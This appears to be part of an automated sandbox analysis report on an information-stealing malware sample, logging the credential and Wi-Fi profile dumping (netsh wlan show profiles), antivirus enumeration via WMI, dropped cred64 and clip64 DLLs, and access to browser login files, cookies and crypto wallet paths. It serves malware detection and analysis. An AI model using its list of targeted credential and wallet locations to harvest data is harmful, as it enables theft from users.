Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B9E27A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00B9E27A
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, type: DROPPED
Source: Yara match File source: 15.2.chrosha.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.amert.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.explorha.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorha.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2052123987.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2792595641.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2089957305.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000003.3292101674.0000000004840000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2687465416.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2831581300.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2110741282.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2880613801.0000000000071000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
Source: Yara match File source: 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3261208378.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000002.3372562116.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072924932.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3071931619.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.3293720784.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072820312.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2990613852.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3072419404.0000000007DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c884f8452a.exe PID: 7988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 1864, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\L6h0MKsU674R9uRTEifr_26.zip, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\lGaQRZaI9ZBmSkbqM2Ghh6s.zip, type: DROPPED
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: powershell.exe, 0000000B.00000002.2827936126.00007FF848E80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
